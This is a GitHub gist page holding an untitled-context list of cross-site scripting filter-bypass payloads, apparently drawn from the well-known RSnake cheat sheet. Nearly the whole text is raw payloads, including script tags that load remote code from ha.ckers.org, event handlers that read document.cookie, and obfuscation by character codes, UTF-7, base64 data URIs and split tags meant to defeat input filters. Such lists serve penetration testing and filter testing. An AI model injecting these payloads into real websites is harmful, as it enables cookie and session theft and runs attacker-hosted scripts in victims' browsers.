-
-
Save cparmn/254a96c3e5e35e7164038481a9b79e50 to your computer and use it in GitHub Desktop.
XSS Filter Bypass List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<a onmouseover="alert(document.cookie)">xxs link</a> | |
<a onmouseover=alert(document.cookie)>xxs link</a> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=# onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> | |
<IMG SRC=javascript:alert( | |
'XSS')> | |
<IMG SRC=javascript:a& | |
#0000108ert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
</script><script>alert('XSS');</script> | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("*//*"); | |
xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
¼script¾alert(¢XSS¢)¼/script¾ | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" | |
veris-->group<svg/onload=alert(/XSS/)// | |
#"><img src=M onerror=alert('XSS');> | |
element[attribute='<img src=x onerror=alert('XSS');> | |
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] | |
%22;alert%28%27RVRSH3LL_XSS%29// | |
javascript:alert%281%29; | |
<w contenteditable id=x onfocus=alert()> | |
alert;pg("XSS") | |
<svg/onload=%26%23097lert%26lpar;1337)> | |
<script>for((i)in(self))eval(i)(1)</script> | |
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> | |
<sCR<script>iPt>alert(1)</SCr</script>IPt> | |
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment